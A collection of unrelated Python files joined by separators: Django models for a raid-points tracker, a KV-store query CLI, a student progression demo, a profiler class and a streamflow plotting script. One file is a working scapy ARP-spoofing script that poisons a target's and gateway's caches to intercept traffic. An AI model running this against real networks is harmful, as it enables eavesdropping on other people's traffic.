    game_race = models.ForeignKey(GameRace)
    game_class = models.ForeignKey(GameClass)
    rank = models.ForeignKey(Rank)
    def __unicode__(self):
        return self.name
class MemberDKP(models.Model):
    """
    Per-tier DKP account of a member: denormalized earned/spent/adjustment
    totals and the time of the last attended raid.

    XXX: pre_delete: remove attendances, loots and adjustments;
    raise an error if the value columns are non-zero after removing them?
    """
    member = models.ForeignKey(Member)
    tier = models.ForeignKey(Tier)
    def clean_tier(self):
        """
        The tier of a MemberDKP must never change -- changing it would
        corrupt the raid attendance records.
        """
        return self.instance.tier
    class Meta:
        """A member has at most one MemberDKP per tier."""
        unique_together = ('member', 'tier')
    # Denormalized totals, refreshed by the update_* methods below.
    value_earned = models.IntegerField(default=0)
    value_spent = models.IntegerField(default=0)
    value_adjustment = models.IntegerField(default=0)
    value_lastraid = models.DateTimeField(null=True, auto_now_add=False)
    objects = QuerySetManager()
    class QuerySet(models.query.QuerySet):
        def active_members(self):
            # Members ranked 'Out' have left the guild.
            return self.exclude(member__rank__name='Out')
        def tier(self, tier):
            return self.filter(tier=tier)
        def game_class(self, var):
            return self.filter(member__game_class=var)
        def standings(self):
            # Attach the 30-day earned sum as a raw subquery so percent30
            # can avoid issuing one extra query per member when rendering
            # the standings page.
            qs = self.extra(
                select={'sum30': """
                SELECT COALESCE(SUM(dkp_raid.value), 0) AS sum30
                FROM dkp_raid, dkp_raid_attendees
                WHERE dkp_raid.id = dkp_raid_attendees.raid_id
                AND dkp_raid_attendees.memberdkp_id = dkp_memberdkp.id
                AND dkp_raid.time >= %s"""},
                select_params=(raid_period(30).isoformat(), ))
            return qs
        def update_dkp(self, tier=-1):
            # Recompute every denormalized column; tier < 0 means all tiers.
            qs = self.filter(tier=tier) if tier >= 0 else self
            for memberdkp in qs:
                memberdkp.update_earned()
                memberdkp.update_spent()
                memberdkp.update_adjustment()
                memberdkp.update_lastraid()
    def __unicode__(self):
        return u'{}'.format(self.name)
    @models.permalink
    def get_absolute_url(self):
        return ('view_member', (), {'tier': self.tier.id, 'memberid': self.member.id})
    @property
    def name(self):
        """For the admin view."""
        return self.member.name
    @property
    def calculate_earned(self):
        return self.raid_set.aggregate(Sum('value'))['value__sum'] or 0
    def update_earned(self):
        self.value_earned = self.calculate_earned
        self.save()
    def correct_earned(self):
        return self.value_earned == self.calculate_earned
    @property
    def calculate_spent(self):
        return self.loot_set.aggregate(Sum('value'))['value__sum'] or 0
    def update_spent(self):
        self.value_spent = self.calculate_spent
        self.save()
    def correct_spent(self):
        return self.value_spent == self.calculate_spent
    @property
    def calculate_adjustment(self):
        return self.adjustment_set.aggregate(Sum('value'))['value__sum'] or 0
    def update_adjustment(self):
        self.value_adjustment = self.calculate_adjustment
        self.save()
    @property
    def correct_adjustment(self):
        return self.value_adjustment == self.calculate_adjustment
    def update_lastraid(self):
        try:
            self.value_lastraid = self.raid_set.latest('time').time
        except Raid.DoesNotExist:
            # No raids attended in this tier yet. (The original bare
            # `except:` also swallowed real errors.)
            self.value_lastraid = None
        self.save()
    @property
    def current(self):
        """Spendable DKP balance."""
        return self.value_earned - self.value_spent + self.value_adjustment
    @cached_method('MemberDKP_{id}_sum_{period}')
    def sum(self, period=-1):
        # DKP earned within `period` days; period <= 0 means all time.
        r = self.raid_set
        if period > 0:
            r = r.filter(time__gte=raid_period(period))
        return r.aggregate(Sum('value'))['value__sum'] or 0
    @cached_method('MemberDKP_{id}_count_{period}')
    def count(self, period=-1):
        # Raids attended within `period` days; period <= 0 means all time.
        r = self.raid_set
        if period > 0:
            r = r.filter(time__gte=raid_period(period))
        return r.count()
    def sumPercent(self, period=-1):
        return calculate_percent(self.sum(period=period), self.tier.sum(period=period))
    def countPercent(self, period=-1):
        return calculate_percent(self.count(period=period), self.tier.count(period=period))
    @cached_property
    def percent30(self):
        try:
            # When rendering standings, sum30 comes from the extra()
            # subquery set up in QuerySet.standings().
            return calculate_percent(self.sum30, self.tier.sum(period=30))
        except AttributeError:
            # Otherwise fall back to a fresh query for this member.
            # (Narrowed from the original bare `except:`.)
            return self.sumPercent(period=30)
    @property
    def good_activity(self):
        return self.percent30 >= 0.6
    @property
    def multiplier(self):
        return self.percent30 if self.good_activity else 0
    @property
    def activity(self):
        return int(100 * self.percent30)
    @property
    def usable(self):
        return int(self.multiplier * self.current)
class Raid(models.Model):
    """A raid occurrence of an Event, granting `value` DKP to all attendees."""
    event = models.ForeignKey(Event)
    time = models.DateTimeField()
    date = models.DateField()  # date-only mirror of `time`, filled in save()
    note = models.TextField(blank=True)
    value = models.IntegerField()
    attendees = models.ManyToManyField(MemberDKP)
    objects = QuerySetManager()
    class QuerySet(models.query.QuerySet):
        def with_attendees_counts(self):
            return self.annotate(attendees_count_a=Count('attendees'))
        @property
        def average_value(self):
            # Avg() is None on an empty queryset; apply `or 0` BEFORE
            # int() -- the original `int(...) or 0` raised TypeError then.
            return int(self.aggregate(Avg('value'))['value__avg'] or 0)
        @property
        def average_attendees(self):
            # Requires with_attendees_counts(); same None guard as above.
            return int(self.aggregate(Avg('attendees_count_a'))['attendees_count_a__avg'] or 0)
    def __unicode__(self):
        return u'{}: {}'.format(self.event.name, self.time.strftime(DATE_FORMAT + ' ' + TIME_FORMAT))
    @models.permalink
    def get_absolute_url(self):
        return ('view_raid', (), {'tier': self.event.tier.id, 'raidid': self.id})
    def tier(self):
        """Tier name, for admin list display."""
        return self.event.tier.name
    def name(self):
        """Event name, for admin list display."""
        return self.event.name
    def save(self, *args, **kwargs):
        # Keep the redundant date column in sync with the datetime; accept
        # Django's standard save() arguments (the original dropped the
        # positional ones).
        self.date = self.time
        super(Raid, self).save(*args, **kwargs)
    @property
    def attendees_count(self):
        try:
            # Present when the queryset used with_attendees_counts().
            return self.attendees_count_a
        except AttributeError:
            # Fall back to a count query (narrowed from a bare `except:`).
            return MemberDKP.objects.filter(raid=self.id).count()
QUALITY_CHOICES = ((0, 'Poor'), (1, 'Common'), (2, 'Uncommon'), (3, 'Rare'), (4, 'Epic'), (5, 'Legendary'), (6, 'Artifact'), (7, 'Heirloom'),)
SOURCE_CHOICES = ((0, 'Normal'), (1, 'Heroic'), (2, 'Raidfinder'),)
class Item(models.Model):
    """
    A lootable item. The primary key doubles as the game's item id.
    """
    name = models.CharField(max_length=100)
    quality = models.SmallIntegerField(default=0, choices=QUALITY_CHOICES)
    icon = models.CharField(max_length=100, null=True)
    source = models.SmallIntegerField(default=0, choices=SOURCE_CHOICES)
    objects = QuerySetManager()
    class QuerySet(models.query.QuerySet):
        def with_drop_counts(self):
            return self.annotate(drop_count=Count('loot'))
        def with_average_loot_values(self):
            return self.annotate(avg_value=Avg('loot__value'))
        @property
        def average_value(self):
            """
            Mean of the items' average loot values; requires
            with_average_loot_values() to have been applied first.
            """
            # Avg() is None on an empty queryset; apply `or 0` BEFORE
            # int() -- the original `int(...) or 0` raised TypeError then.
            return int(self.aggregate(Avg('avg_value'))['avg_value__avg'] or 0)
    def __unicode__(self):
        return u'{}'.format(self.name)
LOOT_CHOICES = ((0, 'Looted'), (1, 'Disenchanted'))
class Loot(models.Model):
    """An item drop from a raid, charged to a member's DKP account."""
    raid = models.ForeignKey(Raid)
    memberdkp = models.ForeignKey(MemberDKP, null=True, blank=True)  # null when not assigned to a member
    status = models.SmallIntegerField(default=0, choices=LOOT_CHOICES)
    item = models.ForeignKey(Item)
    value = models.IntegerField()
    objects = QuerySetManager()
    class QuerySet(models.query.QuerySet):
        @property
        def average_value(self):
            # Avg() is None on an empty queryset; apply `or 0` BEFORE
            # int() -- the original `int(...) or 0` raised TypeError then.
            return int(self.aggregate(Avg('value'))['value__avg'] or 0)
    def __unicode__(self):
        return u'{}'.format(self.item.name)
    @models.permalink
    def get_absolute_url(self):
        return ('view_item', (), {'tier': self.raid.event.tier.id, 'itemid': self.item.id})
    @property
    def name(self):
        return self.item.name
class Adjustment(models.Model):
    """A manual DKP correction applied to a member's account."""
    name = models.CharField(max_length=200)
    memberdkp = models.ForeignKey(MemberDKP)
    time = models.DateTimeField()
    value = models.IntegerField()  # correction amount; may be negative
    def __unicode__(self):
        return self.name
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""The kv_seek command allows to query the turbo-geth/silkworm KV gRPC."""
import argparse
import context # pylint: disable=unused-import
from silksnake.remote import kv_utils
from silksnake.remote.kv_remote import DEFAULT_TARGET
# Build the command-line interface for a single KV seek query.
arg_parser = argparse.ArgumentParser(description=__doc__)
arg_parser.add_argument('bucket', help='the bucket tag as string')
arg_parser.add_argument('seek_key', help='the seek key as hex string without leading 0x')
arg_parser.add_argument('-t', '--target', default=DEFAULT_TARGET, help='the server location as string <address>:<port>')
cli = arg_parser.parse_args()

# Issue the seek against the remote KV store and echo request/response.
print('REQ bucket:', cli.bucket, 'seek_key:', cli.seek_key)
found_key, found_value = kv_utils.kv_seek(cli.bucket, bytes.fromhex(cli.seek_key), cli.target)
print('RSP key:', found_key.hex(), 'value:', found_value.hex())
|
# --------------------------------------------------------------------------------------------------------------------------------------
# Student Progression demo: print ten credit profiles (pass/defer/fail out
# of 120 credits) together with the progression outcome each one maps to.
# --------------------------------------------------------------------------------------------------------------------------------------
print("\n")
print(" ✦ __✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__ ✦")
print(" Welcome to the Student Progression Program - Alternative Staff Version ")
print(" ✦ __✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__✦__ ✦")
print("\n")
l_for_display = ["Pass=120 Defer=00 Fail=00 ", "Pass=100 Defer=20 Fail=0 ", "Pass=100 Defer=0 Fail=20 ",
"Pass =80 Defer= 20 Fail =20 ", "Pass=60 Defer=40 Fail=20 ", "Pass=40 Defer=40 Fail=40",
"Pass=20 Defer=40 Fail=60 ", "Pass=20 Defer=20 Fail=80 ", "Pass=20 Defer=00 Fail=100",
"Pass=00 Defer=00 Fail=120"]
tup_display = ('Progress', 'Progress – module trailer', 'Do not Progress – module retriever', 'Exclude')
#                 0                 1                             2                             3
# Outcome index (into tup_display) for each profile above. The original
# repeated the same four print statements forty times; this loop emits
# byte-identical output.
outcomes = [0, 1, 1, 2, 2, 2, 2, 3, 3, 3]
for profile, outcome in zip(l_for_display, outcomes):
    print("\n")
    print(profile)
    print(tup_display[outcome])
    print("----------------------------")
|
#!/usr/bin/env python3
import scapy.all as net
import sys, os, time, math, threading
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import get_machines
# scapy send() verbosity; 0 suppresses per-packet output.
VERBOSITY = 0
print("Finding network devices...")
# NOTE(review): assumes get_machines.search() returns a mapping with
# "target" and "gateway" entries exposing .mac and .ip -- confirm.
machines = get_machines.search(ps4=True)
print("Enabling IP Forward...")
# Forward packets through this host so the target keeps connectivity
# while its traffic is relayed (Linux-only; requires root).
with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
    f.write("1")
try:
    print("Altering ARP...")
    # Re-poison both caches every 2 s until interrupted.
    # Only run this on networks you are explicitly authorized to test.
    while True:
        #hwdst is the actual recipient of the ARP packet, psrc is where the requests want to go, pdst is where they end up
        net.send(net.ARP(op="who-has", hwdst=machines["target"].mac, pdst=machines["target"].ip, psrc=machines["gateway"].ip), verbose=VERBOSITY)
        net.send(net.ARP(op="who-has", hwdst=machines["gateway"].mac, pdst=machines["gateway"].ip, psrc=machines["target"].ip), verbose=VERBOSITY)
        time.sleep(2) #typically kept in the ARP cache for 60s
except KeyboardInterrupt:
    pass
print("Restoring ARP...")
# Re-announce the true MAC addresses so both caches recover immediately.
net.send(net.ARP(op="who-has", hwdst=machines["target"].mac, pdst=machines["target"].ip, hwsrc=machines["gateway"].mac, psrc=machines["gateway"].ip), verbose=VERBOSITY)
net.send(net.ARP(op="who-has", hwdst=machines["gateway"].mac, pdst=machines["gateway"].ip, hwsrc=machines["target"].mac, psrc=machines["target"].ip), verbose=VERBOSITY)
print("Disabling IP Forward...")
with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
    f.write("0")
|
import prof
class MethodInfo(object):
    """Profiling metadata for a single wrapped method."""
    def __init__(self, method):
        self.method = method            # the wrapped callable
        self.method_instances = []      # recorded invocations of this method
    def invoke(self, *args, **kwargs):
        """Invoke the method as a child of the currently active profiled call."""
        return prof.METHOD_INSTANCE_STACK[-1].invoke_child(self, *args, **kwargs)
    def __str__(self):
        # The original signature accepted spurious *args/**kwargs that
        # str() never passes; dropped.
        return "{0}::{1}".format(self.method.__module__, self.method.__name__)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
TO RUN: script from command line: python SummarizeData.py filename # not including file extension
Created on Fri Mar 20 16:30:24 2020
Assignment 6
Run this script once to open a user-defined data file, generate a pdf summary of figures,
and a second time to do the same with a user-defined different data file.
@author: wagne216
"""
# modules:
import numpy as n
import matplotlib.pyplot as m
import pylab as p
import sys as s # to get command line arg
# Echo the data file name so the user can confirm the input.
print('Working with file named ',s.argv[1]+'.txt')
# 1.) OPEN the whitespace-delimited data file: one header line, one
# variable per column (year, mean, max, min, stdev, Tqmean fraction,
# R-B index).
#file_title=('Tippecanoe_River_at_Ora.Annual_Metrics') # test with known filename
file_title = s.argv[1] # accepts argument in command line for title
in_file = file_title + '.txt'
yr,avg,mx,mn,sdev,tqmean,RB = \
    n.genfromtxt(in_file, \
    unpack=True, skip_header=1)
#%% 2.) PLOT
# Figure proportions >= 1:1.5 avoid title/xlabel overlap between subplots.
m.figure(figsize=(9,15), dpi=50)
# PLOT 1: min, max, mean streamflow (cfs) as lines
m.subplot(3,1,1)
m.plot(yr, mn, color="blue", linewidth=2.5, linestyle="-", label="min")
m.plot(yr, mx, color="red", linewidth=2.5, linestyle="-", label="max")
m.plot(yr, avg, color="black", linewidth=2.5, linestyle="-", label="mean")
m.legend(loc='best', frameon=False)
# pad the y-axis 5% above the largest value
m.ylim(0,1.05*mx.max())
m.xlim(yr.min(),yr.max())
m.title('Annual Values for Streamflow')
m.xlabel('Year')
m.ylabel('Streamflow (cfs)')
#%% PLOT 2: Tqmean (%) as symbols
m.subplot(3,1,2)
m.plot(yr, tqmean*100, color='#32a850',marker='4',linestyle='none',label="tq")
m.ylim(0,1.05*100*tqmean.max())
m.xlim(yr.min(),yr.max())
m.title('Annual Values for % Tqmean')
m.xlabel('Year')
m.ylabel('Tqmean (%)')
#%% PLOT 3: R-B Index (ratio) as bars
m.subplot(3,1,3)
# (removed unused local `num = len(yr)` -- it was never referenced)
m.bar(yr,RB,color='#cbf525',edgecolor='#f525dd',width=1)
m.ylim(0,1.05*RB.max())
m.xlim(yr.min(),yr.max())
m.title('Annual Values for R-B Index')
m.xlabel('Year')
m.ylabel('R-B Index (ratio)')
# %%3.) WRITE TO PDF
p.savefig(file_title+'.pdf') # use original filename input by user as the title
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.